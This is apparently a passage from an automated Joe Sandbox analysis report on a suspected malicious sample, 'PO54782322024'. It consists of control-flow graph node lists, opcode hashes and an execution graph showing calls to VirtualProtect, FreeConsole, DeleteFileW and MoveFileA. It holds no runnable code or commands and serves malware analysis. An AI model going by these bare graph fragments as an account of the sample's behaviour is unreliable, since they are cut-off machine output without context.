7ffd9b87c329-7ffd9b87c331 1809->1817 1820 7ffd9b87bf91-7ffd9b87bf9d 1812->1820 1821 7ffd9b87c08c-7ffd9b87c0af 1812->1821 1823 7ffd9b87c184-7ffd9b87c198 1814->1823 1824 7ffd9b87c116-7ffd9b87c16d call 7ffd9b873070 1814->1824 1826 7ffd9b87c374-7ffd9b87c37f 1816->1826 1827 7ffd9b87c36f call 7ffd9b879890 1816->1827 1817->1816 1831 7ffd9b87c253-7ffd9b87c25b 1819->1831 1820->1764 1832 7ffd9b87bfa3-7ffd9b87bfb2 1820->1832 1840 7ffd9b87c0b5-7ffd9b87c0b6 1821->1840 1828 7ffd9b87c19a-7ffd9b87c1b5 1823->1828 1829 7ffd9b87c1e7-7ffd9b87c1f3 call 7ffd9b875790 1823->1829 1880 7ffd9b87c16f-7ffd9b87c173 1824->1880 1881 7ffd9b87c1de-7ffd9b87c1e4 1824->1881 1854 7ffd9b87c391 1826->1854 1855 7ffd9b87c381-7ffd9b87c38f 1826->1855 1827->1826 1841 7ffd9b87c1bb-7ffd9b87c1c5 call 7ffd9b873070 1828->1841 1847 7ffd9b87c1f4-7ffd9b87c20c 1829->1847 1831->1764 1835 7ffd9b87bfb4-7ffd9b87bfc3 1832->1835 1836 7ffd9b87bfc5-7ffd9b87bfd2 call 7ffd9b870388 1832->1836 1860 7ffd9b87bfd8-7ffd9b87bfde 1835->1860 1836->1860 1840->1795 1859 7ffd9b87c1ca-7ffd9b87c1d2 1841->1859 1870 7ffd9b87bf76-7ffd9b87bf82 1846->1870 1871 7ffd9b87bf75 1846->1871 1847->1764 1856 7ffd9b87c20e-7ffd9b87c21e 1847->1856 1850->1851 1851->1798 1861 7ffd9b87c393-7ffd9b87c398 1854->1861 1855->1861 1857 7ffd9b87c220-7ffd9b87c22b 1856->1857 1865 7ffd9b87c22e-7ffd9b87c23e 1857->1865 1859->1803 1867 7ffd9b87c1d4-7ffd9b87c1d7 1859->1867 1868 7ffd9b87c013-7ffd9b87c018 1860->1868 1869 7ffd9b87bfe0-7ffd9b87c00d 1860->1869 1863 7ffd9b87c3af-7ffd9b87c3b7 call 7ffd9b873088 1861->1863 1864 7ffd9b87c39a-7ffd9b87c3ad call 7ffd9b870810 1861->1864 1883 7ffd9b87c3bc-7ffd9b87c3c3 1863->1883 1864->1883 1867->1831 1876 7ffd9b87c1d9 1867->1876 1868->1764 1874 7ffd9b87c01e-7ffd9b87c03e 1868->1874 1869->1868 1870->1812 1871->1870 1887 7ffd9b87c052-7ffd9b87c061 1874->1887 1888 7ffd9b87c040-7ffd9b87c051 1874->1888 1876->1857 1884 7ffd9b87c1db 1876->1884 1880->1847 1886 7ffd9b87c175-7ffd9b87c17f 1880->1886 1881->1829 1884->1881 1886->1865 1890 7ffd9b87c069-7ffd9b87c082 call 7ffd9b877740 1887->1890 1888->1887 1892 7ffd9b87c087-7ffd9b87c08a 1890->1892 1892->1795
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5b3958a57376f6dec84eba64fdd9bc7350bcdcfe98f1d43d765967421f528a4
                                                                                        • Instruction ID: 8a4feb2f3613dc06485d049932c0db25b42a980b35e15a287c97cb3c256b2507
                                                                                        • Opcode Fuzzy Hash: e5b3958a57376f6dec84eba64fdd9bc7350bcdcfe98f1d43d765967421f528a4
                                                                                        • Instruction Fuzzy Hash: B8221730B0DA0D4FDB68DB6C98A5A7977E1EF59304F1501BDE04EC72A2DE24ED428B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a79e99dfe1ed185033199f24b06740dc66cc4389b1b8bc9cf10c1e9ce734e727
                                                                                        • Instruction ID: 54344e64a4dc622a59413d92b468de030461357d200f99b5bcef243b3343c2c0
                                                                                        • Opcode Fuzzy Hash: a79e99dfe1ed185033199f24b06740dc66cc4389b1b8bc9cf10c1e9ce734e727
                                                                                        • Instruction Fuzzy Hash: 4DD19C31A1DB894FE32CCB6884A50B1B7E2FF99305B15467EE4CAC32B1DA34E542C781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e048cafea241dc0e27af0c0c3d212ed74a6233e1284fd14424215d71851fbadb
                                                                                        • Instruction ID: 02627fd9012f0844161b64813e16c66ea5249cc1056a8f3deac9b40b8a47b27a
                                                                                        • Opcode Fuzzy Hash: e048cafea241dc0e27af0c0c3d212ed74a6233e1284fd14424215d71851fbadb
                                                                                        • Instruction Fuzzy Hash: F4415B31A0D7490FD71E9B789C660B63B95DB47220B0582BFE497CB2E7DC24684783D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ae20fcac0c63c7926996229902b106ea4a2d5c66c5a49d6b545feaf3965cad6e
                                                                                        • Instruction ID: 07597431d19802069320486398e2730062d58b64ba7daff4eec12a788b45424d
                                                                                        • Opcode Fuzzy Hash: ae20fcac0c63c7926996229902b106ea4a2d5c66c5a49d6b545feaf3965cad6e
                                                                                        • Instruction Fuzzy Hash: 5E415C3160D7891FD72F9B748C615663FA5EB47210F0582BFE096C71E7DD2468078392

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 478 7ffd9b870d60-7ffd9b870d67 479 7ffd9b870d72-7ffd9b870d7a 478->479 480 7ffd9b870d69-7ffd9b870d71 478->480 481 7ffd9b870d7c-7ffd9b870da7 479->481 482 7ffd9b870d17-7ffd9b870d2c FreeConsole 479->482 480->479 486 7ffd9b870da9 481->486 487 7ffd9b870daa-7ffd9b870db9 481->487 483 7ffd9b870d34-7ffd9b870d5b 482->483 484 7ffd9b870d2e 482->484 484->483 486->487 489 7ffd9b870dd2-7ffd9b870dd5 487->489 490 7ffd9b870dbb-7ffd9b870dd0 487->490 491 7ffd9b870dd7 489->491 492 7ffd9b870dd8-7ffd9b870dfe 489->492 490->489 491->492 495 7ffd9b870e00-7ffd9b870e0c 492->495 496 7ffd9b870e58-7ffd9b870e5f 492->496 499 7ffd9b870e0e-7ffd9b870e15 495->499 500 7ffd9b870e3a-7ffd9b870e3d 495->500 497 7ffd9b870e61-7ffd9b870e76 496->497 498 7ffd9b870e86-7ffd9b870e8c 496->498 511 7ffd9b870e79-7ffd9b870e81 497->511 512 7ffd9b870e78 497->512 503 7ffd9b870e9d-7ffd9b870ea4 498->503 504 7ffd9b870e8e-7ffd9b870e93 498->504 501 7ffd9b870e32 499->501 502 7ffd9b870e17-7ffd9b870e26 499->502 505 7ffd9b870e3f-7ffd9b870e43 500->505 506 7ffd9b870e4a-7ffd9b870e56 500->506 508 7ffd9b870e37-7ffd9b870e38 501->508 502->508 509 7ffd9b870e28-7ffd9b870e2e 502->509 503->501 510 7ffd9b870ea6-7ffd9b870eb4 503->510 504->503 505->506 506->495 506->496 508->500 509->499 513 7ffd9b870e30 509->513 514 7ffd9b870eb8-7ffd9b870eba 510->514 515 7ffd9b870eb6 510->515 516 7ffd9b870f15-7ffd9b870f29 511->516 512->511 513->500 518 7ffd9b870ecb-7ffd9b870ed2 514->518 519 7ffd9b870ebc-7ffd9b870ec1 514->519 517 7ffd9b870ee0-7ffd9b870f12 515->517 517->516 518->501 520 7ffd9b870ed8-7ffd9b870edc 518->520 519->518 520->517
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7a847715850288b07582571170f6a863aa69a9953042708d4177887aba516b20
                                                                                        • Instruction ID: 59922d0ea9ca8d061d75a211116c8b2fccbc52596ebd0f9dcb6e4f0990abbb54
                                                                                        • Opcode Fuzzy Hash: 7a847715850288b07582571170f6a863aa69a9953042708d4177887aba516b20
                                                                                        • Instruction Fuzzy Hash: DF816731B1D64E4FEB288BA8D8A26B9BBD1EF45314F04417ED08EC31E7DD29B8028741

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: f5e04a0e732cd2e82482bcfd107e165134695dd56c0a9d4fa1ea352a72494fd4
                                                                                        • Instruction ID: 17b899a9768cfeed691812ab256d8dff065fe1eee46f9d39b40cbd2216a0f047
                                                                                        • Opcode Fuzzy Hash: f5e04a0e732cd2e82482bcfd107e165134695dd56c0a9d4fa1ea352a72494fd4
                                                                                        • Instruction Fuzzy Hash: 6631C431A0CB4C8FDB1CEF98A8466F9B7E1FB99321F04427FD049C3592DB65A8468781

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 718 7ffd9b877f1d-7ffd9b88689f VirtualProtect 723 7ffd9b8868a1 718->723 724 7ffd9b8868a7-7ffd9b8868cf 718->724 723->724
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: f6a6685468bb93dc6c9c78e86b23f8a562c2cb181a1471e536668ab09b9bfd8d
                                                                                        • Instruction ID: 509f498a23d76309e1b61190d3de399fd864cf620c5608d8a5ead5f5606235fb
                                                                                        • Opcode Fuzzy Hash: f6a6685468bb93dc6c9c78e86b23f8a562c2cb181a1471e536668ab09b9bfd8d
                                                                                        • Instruction Fuzzy Hash: 89312831A0DA4C4FDB18DB9DD8456F9BBE1EF95321F00427FD04AC3292CB606846C791

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 705 7ffd9b870c61-7ffd9b870c6d 706 7ffd9b870c6f 705->706 707 7ffd9b870c70-7ffd9b870c81 705->707 706->707 708 7ffd9b870c83 707->708 709 7ffd9b870c84-7ffd9b870c95 707->709 708->709 710 7ffd9b870c97 709->710 711 7ffd9b870c98-7ffd9b870d11 709->711 710->711 715 7ffd9b870d17-7ffd9b870d2c FreeConsole 711->715 716 7ffd9b870d34-7ffd9b870d5b 715->716 717 7ffd9b870d2e 715->717 717->716
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleFree
                                                                                        • String ID:
                                                                                        • API String ID: 771614528-0
                                                                                        • Opcode ID: e78a53a4035e5ee5d0a4edf94a04d810532d32d90b9369d3011ea39ebc63180d
                                                                                        • Instruction ID: 57995a0b9bbe474d4c95a09e6374b0d10a79565e5d19a7ac587b56df4e57c5ce
                                                                                        • Opcode Fuzzy Hash: e78a53a4035e5ee5d0a4edf94a04d810532d32d90b9369d3011ea39ebc63180d
                                                                                        • Instruction Fuzzy Hash: E231267050D7889FDB26DBA88895AFA7FF4EF56321F0441AFD0C9C3093D6246546CB52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907444028.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b950000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e63f86029247a0542b881196841e542c9918b3782bbc7872e6a1e722e2cd5ced
                                                                                        • Instruction ID: d41711915ae6ae9ea5d181cd4b12810793fb7051e940a7c1249f36e63959abca
                                                                                        • Opcode Fuzzy Hash: e63f86029247a0542b881196841e542c9918b3782bbc7872e6a1e722e2cd5ced
                                                                                        • Instruction Fuzzy Hash: 11415A32A4DA9D5FDF66DF94C8654E83BB0FF15304F0601FAD849CB1A2DA65AD41C780

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:317
                                                                                        Total number of Limit Nodes:38
                                                                                        execution_graph 32323 ff9d98 32324 ff9db0 32323->32324 32327 ff1360 32324->32327 32328 ff1380 32327->32328 32329 ff15f6 32328->32329 32339 ff18af 32328->32339 32345 ff18c0 32328->32345 32351 ff8457 32328->32351 32357 ff8281 32328->32357 32366 ff80a8 32328->32366 32375 ff81e4 32328->32375 32384 ff8222 32328->32384 32393 ff8a52 32328->32393 32402 ff8b78 32328->32402 32342 ff18c0 32339->32342 32340 ff19d6 32340->32328 32341 ff1360 DeleteFileW 32341->32342 32342->32340 32342->32341 32408 ff7179 32342->32408 32415 ff19e2 32342->32415 32347 ff18c7 32345->32347 32346 ff19d6 32346->32328 32347->32346 32348 ff1360 DeleteFileW 32347->32348 32349 ff7179 DeleteFileW 32347->32349 32350 ff19e2 DeleteFileW 32347->32350 32348->32347 32349->32347 32350->32347 32352 ff8487 32351->32352 32353 ff1360 DeleteFileW 32352->32353 32356 ff8537 32352->32356 32354 ff8505 32353->32354 32355 ff1360 DeleteFileW 32354->32355 32355->32356 32356->32328 32358 ff8286 32357->32358 32359 ff1360 DeleteFileW 32358->32359 32360 ff8296 32359->32360 32361 ff1360 DeleteFileW 32360->32361 32363 ff82c8 32361->32363 32362 ff8323 32362->32328 32441 ff8332 32363->32441 32447 ff8340 32363->32447 32371 ff80d1 32366->32371 32367 ff8323 32367->32328 32368 ff1360 DeleteFileW 32369 ff8296 32368->32369 32370 ff1360 DeleteFileW 32369->32370 32372 ff82c8 32370->32372 32371->32367 32371->32368 32373 ff8332 DeleteFileW 32372->32373 32374 ff8340 DeleteFileW 32372->32374 32373->32367 32374->32367 32379 ff81e9 32375->32379 32376 ff1360 DeleteFileW 32377 ff8296 32376->32377 32378 ff1360 DeleteFileW 32377->32378 32381 ff82c8 32378->32381 32379->32376 32380 ff8323 32380->32328 32382 ff8332 DeleteFileW 32381->32382 32383 ff8340 DeleteFileW 32381->32383 32382->32380 32383->32380 32387 ff8227 32384->32387 32385 ff1360 DeleteFileW 32386 ff8296 32385->32386 32388 ff1360 DeleteFileW 32386->32388 32387->32385 32389 ff82c8 32388->32389 32391 ff8332 DeleteFileW 32389->32391 32392 ff8340 DeleteFileW 32389->32392 32390 ff8323 32390->32328 32391->32390 32392->32390 32394 ff8a76 32393->32394 32395 ff8b27 32394->32395 32457 ff9380 32394->32457 32463 ff9391 32394->32463 32469 ff9395 32394->32469 32475 ff9399 32394->32475 32481 ff93d9 32394->32481 32487 ff9430 32394->32487 32395->32328 32404 ff8b82 32402->32404 32403 ff8bd6 32403->32328 32404->32403 32405 ff1360 DeleteFileW 32404->32405 32406 ff8bc2 32405->32406 32407 ff1360 DeleteFileW 32406->32407 32407->32403 32410 ff71a0 32408->32410 32409 ff71e4 32409->32342 32410->32409 32411 ff1360 DeleteFileW 32410->32411 32412 ff72b3 32411->32412 32413 ff1360 DeleteFileW 32412->32413 32414 ff7317 32413->32414 32416 ff1a09 32415->32416 32429 ff1ac0 32416->32429 32435 ff1ab0 32416->32435 32417 ff1a25 32427 ff51e0 DeleteFileW 32417->32427 32428 ff51d0 DeleteFileW 32417->32428 32418 ff1a2d 32419 ff1360 DeleteFileW 32418->32419 32420 ff1a55 32419->32420 32421 ff1a81 32420->32421 32422 ff1360 DeleteFileW 32420->32422 32421->32342 32423 ff1a75 32422->32423 32424 ff1360 DeleteFileW 32423->32424 32424->32421 32427->32418 32428->32418 32430 ff1ad6 32429->32430 32431 ff1360 DeleteFileW 32430->32431 32432 ff1afa 32431->32432 32433 ff1360 DeleteFileW 32432->32433 32434 ff1b8a 32432->32434 32433->32432 32434->32434 32436 ff1ac0 32435->32436 32437 ff1360 DeleteFileW 32436->32437 32440 ff1afa 32437->32440 32438 ff1360 DeleteFileW 32438->32440 32439 ff1b8a 32439->32439 32440->32438 32440->32439 32442 ff8350 32441->32442 32443 ff8388 32442->32443 32444 ff1360 DeleteFileW 32442->32444 32443->32362 32445 ff8378 32444->32445 32453 ff7aac 32445->32453 32448 ff8350 32447->32448 32449 ff1360 DeleteFileW 32448->32449 32452 ff8388 32448->32452 32450 ff8378 32449->32450 32451 ff7aac DeleteFileW 32450->32451 32451->32452 32452->32362 32454 ff83a8 DeleteFileW 32453->32454 32456 ff8427 32454->32456 32456->32443 32460 ff9385 32457->32460 32458 ff1360 DeleteFileW 32458->32460 32459 ff9d36 32459->32394 32460->32458 32460->32459 32493 ffb60a 32460->32493 32500 ffb6b3 32460->32500 32464 ff9390 32463->32464 32465 ff1360 DeleteFileW 32464->32465 32466 ff9d36 32464->32466 32467 ffb60a DeleteFileW 32464->32467 32468 ffb6b3 DeleteFileW 32464->32468 32465->32464 32466->32394 32467->32464 32468->32464 32470 ff9390 32469->32470 32471 ff1360 DeleteFileW 32470->32471 32472 ff9d36 32470->32472 32473 ffb60a DeleteFileW 32470->32473 32474 ffb6b3 DeleteFileW 32470->32474 32471->32470 32472->32394 32473->32470 32474->32470 32477 ff9390 32475->32477 32476 ff1360 DeleteFileW 32476->32477 32477->32476 32478 ff9d36 32477->32478 32479 ffb60a DeleteFileW 32477->32479 32480 ffb6b3 DeleteFileW 32477->32480 32478->32394 32479->32477 32480->32477 32483 ff9390 32481->32483 32482 ff1360 DeleteFileW 32482->32483 32483->32481 32483->32482 32484 ff9d36 32483->32484 32485 ffb60a DeleteFileW 32483->32485 32486 ffb6b3 DeleteFileW 32483->32486 32484->32394 32485->32483 32486->32483 32488 ff93f1 32487->32488 32489 ff1360 DeleteFileW 32488->32489 32490 ff9d36 32488->32490 32491 ffb60a DeleteFileW 32488->32491 32492 ffb6b3 DeleteFileW 32488->32492 32489->32488 32490->32394 32491->32488 32492->32488 32495 ffb62d 32493->32495 32494 ffb6c9 32495->32494 32507 fff2b0 32495->32507 32520 ffb700 32495->32520 32527 fff2c0 32495->32527 32540 ffb710 32495->32540 32502 ffb688 32500->32502 32501 ffb6c9 32502->32501 32503 fff2b0 DeleteFileW 32502->32503 32504 ffb710 DeleteFileW 32502->32504 32505 fff2c0 DeleteFileW 32502->32505 32506 ffb700 DeleteFileW 32502->32506 32503->32502 32504->32502 32505->32502 32506->32502 32508 fff2cf 32507->32508 32512 fff32f 32507->32512 32508->32495 32509 fff3ca 32509->32495 32510 ff1360 DeleteFileW 32517 fff4e2 32510->32517 32511 ff1360 DeleteFileW 32513 fff65f 32511->32513 32512->32509 32512->32510 32512->32513 32513->32511 32515 fff66a 32513->32515 32519 fff735 32513->32519 32514 fff92c 32514->32495 32515->32495 32516 ff1360 DeleteFileW 32516->32517 32517->32513 32517->32516 32518 ff1360 DeleteFileW 32518->32519 32519->32514 32519->32518 32523 ffb72a 32520->32523 32521 ffb7f3 32522 ff1360 DeleteFileW 32522->32523 32523->32521 32523->32522 32547 ffbb71 32523->32547 32570 ffb948 32523->32570 32593 ffb81d 32523->32593 32528 fff2cf 32527->32528 32532 fff32f 32527->32532 32528->32495 32529 fff3ca 32529->32495 32530 ff1360 DeleteFileW 32537 fff4e2 32530->32537 32531 ff1360 DeleteFileW 32533 fff65f 32531->32533 32532->32529 32532->32530 32532->32533 32533->32531 32534 fff66a 32533->32534 32535 fff735 32533->32535 32534->32495 32538 ff1360 DeleteFileW 32535->32538 32539 fff92c 32535->32539 32536 ff1360 DeleteFileW 32536->32537 32537->32533 32537->32536 32538->32535 32539->32495 32541 ffb72a 32540->32541 32542 ffb7f3 32541->32542 32543 ff1360 DeleteFileW 32541->32543 32544 ffb81d DeleteFileW 32541->32544 32545 ffb948 DeleteFileW 32541->32545 32546 ffbb71 DeleteFileW 32541->32546 32543->32541 32544->32541 32545->32541 32546->32541 32556 ffb851 32547->32556 32548 ffbba0 32548->32523 32549 ff1360 DeleteFileW 32549->32556 32550 ff1360 DeleteFileW 32551 ffbbad 32550->32551 32551->32550 32552 ffbc89 32551->32552 32553 ffbd8f 32551->32553 32552->32523 32554 ffbe1c 32553->32554 32557 ffbe46 32553->32557 32561 ffb81d DeleteFileW 32553->32561 32562 ffb948 DeleteFileW 32553->32562 32565 ffbb71 DeleteFileW 32553->32565 32616 ffbbc8 32553->32616 32629 ffbbb8 32553->32629 32555 ff1360 DeleteFileW 32554->32555 32555->32557 32556->32548 32556->32549 32556->32551 32558 ffb81d DeleteFileW 32556->32558 32559 fff2c0 DeleteFileW 32556->32559 32560 fff2b0 DeleteFileW 32556->32560 32566 ffb948 DeleteFileW 32556->32566 32567 ffbbc8 DeleteFileW 32556->32567 32568 ffbbb8 DeleteFileW 32556->32568 32569 ffbb71 DeleteFileW 32556->32569 32557->32523 32558->32556 32559->32556 32560->32556 32561->32554 32562->32554 32565->32554 32566->32556 32567->32556 32568->32556 32569->32556 32574 ffb851 32570->32574 32571 ffbba0 32571->32523 32572 ffbd8f 32577 ffbe1c 32572->32577 32579 ffbe46 32572->32579 32581 ffb81d DeleteFileW 32572->32581 32582 ffb948 DeleteFileW 32572->32582 32583 ffbbc8 DeleteFileW 32572->32583 32584 ffbbb8 DeleteFileW 32572->32584 32585 ffbb71 DeleteFileW 32572->32585 32573 ff1360 DeleteFileW 32575 ffbbad 32573->32575 32574->32571 32574->32575 32580 ff1360 DeleteFileW 32574->32580 32586 ffbbc8 DeleteFileW 32574->32586 32587 ffbbb8 DeleteFileW 32574->32587 32588 ffbb71 DeleteFileW 32574->32588 32589 fff2c0 DeleteFileW 32574->32589 32590 fff2b0 DeleteFileW 32574->32590 32591 ffb81d DeleteFileW 32574->32591 32592 ffb948 DeleteFileW 32574->32592 32575->32572 32575->32573 32576 ffbc89 32575->32576 32576->32523 32578 ff1360 DeleteFileW 32577->32578 32578->32579 32579->32523 32580->32574 32581->32577 32582->32577 32583->32577 32584->32577 32585->32577 32586->32574 32587->32574 32588->32574 32589->32574 32590->32574 32591->32574 32592->32574 32603 ffb851 32593->32603 32594 ffbba0 32594->32523 32595 ff1360 DeleteFileW 32596 ffbbad 32595->32596 32596->32595 32597 ffbc89 32596->32597 32598 ffbd8f 32596->32598 32597->32523 32600 ffbe1c 32598->32600 32602 ffbe46 32598->32602 32609 ffb81d DeleteFileW 32598->32609 32610 ffb948 DeleteFileW 32598->32610 32611 ffbbc8 DeleteFileW 32598->32611 32612 ffbbb8 DeleteFileW 32598->32612 32613 ffbb71 DeleteFileW 32598->32613 32599 ff1360 DeleteFileW 32599->32603 32601 ff1360 DeleteFileW 32600->32601 32601->32602 32602->32523 32603->32594 32603->32596 32603->32599 32604 ffb81d DeleteFileW 32603->32604 32605 ffb948 DeleteFileW 32603->32605 32606 ffbbc8 DeleteFileW 32603->32606 32607 ffbbb8 DeleteFileW 32603->32607 32608 ffbb71 DeleteFileW 32603->32608 32614 fff2c0 DeleteFileW 32603->32614 32615 fff2b0 DeleteFileW 32603->32615 32604->32603 32605->32603 32606->32603 32607->32603 32608->32603 32609->32600 32610->32600 32611->32600 32612->32600 32613->32600 32614->32603 32615->32603 32618 ffbbe4 32616->32618 32617 ff1360 DeleteFileW 32617->32618 32618->32617 32619 ffbc89 32618->32619 32620 ffbd8f 32618->32620 32619->32554 32621 ffbe1c 32620->32621 32623 ffbe46 32620->32623 32624 ffb81d DeleteFileW 32620->32624 32625 ffb948 DeleteFileW 32620->32625 32626 ffbbc8 DeleteFileW 32620->32626 32627 ffbbb8 DeleteFileW 32620->32627 32628 ffbb71 DeleteFileW 32620->32628 32622 ff1360 DeleteFileW 32621->32622 32622->32623 32623->32554 32624->32621 32625->32621 32626->32621 32627->32621 32628->32621 32631 ffbbe4 32629->32631 32630 ff1360 DeleteFileW 32630->32631 32631->32630 32632 ffbc89 32631->32632 32633 ffbd8f 32631->32633 32632->32554 32634 ffbe1c 32633->32634 32636 ffbe46 32633->32636 32637 ffb81d DeleteFileW 32633->32637 32638 ffb948 DeleteFileW 32633->32638 32639 ffbbc8 DeleteFileW 32633->32639 32640 ffbbb8 DeleteFileW 32633->32640 32641 ffbb71 DeleteFileW 32633->32641 32635 ff1360 DeleteFileW 32634->32635 32635->32636 32636->32554 32637->32634 32638->32634 32639->32634 32640->32634 32641->32634 32646 ff0848 32647 ff084d 32646->32647 32648 ff088f 32647->32648 32651 ff1360 DeleteFileW 32647->32651 32652 ff1734 32647->32652 32665 ff1352 32647->32665 32651->32647 32653 ff1742 32652->32653 32655 ff161e 32652->32655 32654 ff172e 32654->32647 32655->32654 32656 ff80a8 DeleteFileW 32655->32656 32657 ff81e4 DeleteFileW 32655->32657 32658 ff8222 DeleteFileW 32655->32658 32659 ff8281 DeleteFileW 32655->32659 32660 ff8b78 DeleteFileW 32655->32660 32661 ff8a52 DeleteFileW 32655->32661 32662 ff18af DeleteFileW 32655->32662 32663 ff18c0 DeleteFileW 32655->32663 32664 ff8457 DeleteFileW 32655->32664 32656->32655 32657->32655 32658->32655 32659->32655 32660->32655 32661->32655 32662->32655 32663->32655 32664->32655 32667 ff135b 32665->32667 32668 ff12ec 32665->32668 32666 ff15f6 32666->32647 32667->32666 32669 ff172e 32667->32669 32670 ff18af DeleteFileW 32667->32670 32671 ff18c0 DeleteFileW 32667->32671 32672 ff8b78 DeleteFileW 32667->32672 32673 ff8a52 DeleteFileW 32667->32673 32674 ff8457 DeleteFileW 32667->32674 32675 ff80a8 DeleteFileW 32667->32675 32676 ff81e4 DeleteFileW 32667->32676 32677 ff8222 DeleteFileW 32667->32677 32678 ff8281 DeleteFileW 32667->32678 32668->32647 32669->32647 32670->32667 32671->32667 32672->32667 32673->32667 32674->32667 32675->32667 32676->32667 32677->32667 32678->32667 32642 ff8990 32643 ff89db MoveFileA 32642->32643 32645 ff8a2f 32643->32645

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 136 63d3600-63d361f 137 63d3621-63d3624 136->137 138 63d3ebe-63d3ec1 137->138 139 63d362a-63d3651 137->139 140 63d3ee7-63d3ee9 138->140 141 63d3ec3-63d3ee2 138->141 148 63d366a-63d3674 139->148 149 63d3653-63d3656 139->149 143 63d3eeb 140->143 144 63d3ef0-63d3ef3 140->144 141->140 143->144 144->137 146 63d3ef9-63d3f06 144->146 153 63d367a-63d3689 148->153 149->148 151 63d3658-63d3668 149->151 151->153 285 63d368b call 63d3f18 153->285 286 63d368b call 63d3f10 153->286 155 63d3690-63d3692 156 63d36a5-63d3a3b 155->156 157 63d3694-63d36a0 155->157 195 63d3a41-63d3af0 156->195 196 63d3eb0-63d3ebd 156->196 157->146 205 63d3b19 195->205 206 63d3af2-63d3b17 195->206 208 63d3b22-63d3b2b call 63d21ec 205->208 206->208 210 63d3b30-63d3b32 208->210 211 63d3b38-63d3b57 call 63d21f8 210->211 212 63d3e91-63d3e9d 210->212 211->212 216 63d3b5d-63d3b67 211->216 212->195 213 63d3ea3 212->213 213->196 216->212 217 63d3b6d-63d3b78 216->217 217->212 218 63d3b7e-63d3c64 217->218 232 63d3c66-63d3c68 218->232 233 63d3c72-63d3caa 218->233 232->233 238 63d3cac-63d3cae 233->238 239 63d3cb8-63d3cc4 233->239 238->239 240 63d3cc6-63d3cca 239->240 241 63d3d32-63d3d4d call 63d2210 239->241 240->241 242 63d3ccc-63d3cfe 240->242 246 63d3d53-63d3d97 241->246 247 63d3e82-63d3e8b 241->247 254 63d3d0c-63d3d2b call 63d2204 242->254 255 63d3d00-63d3d02 242->255 261 63d3d99-63d3d9b 246->261 262 63d3da5-63d3db3 246->262 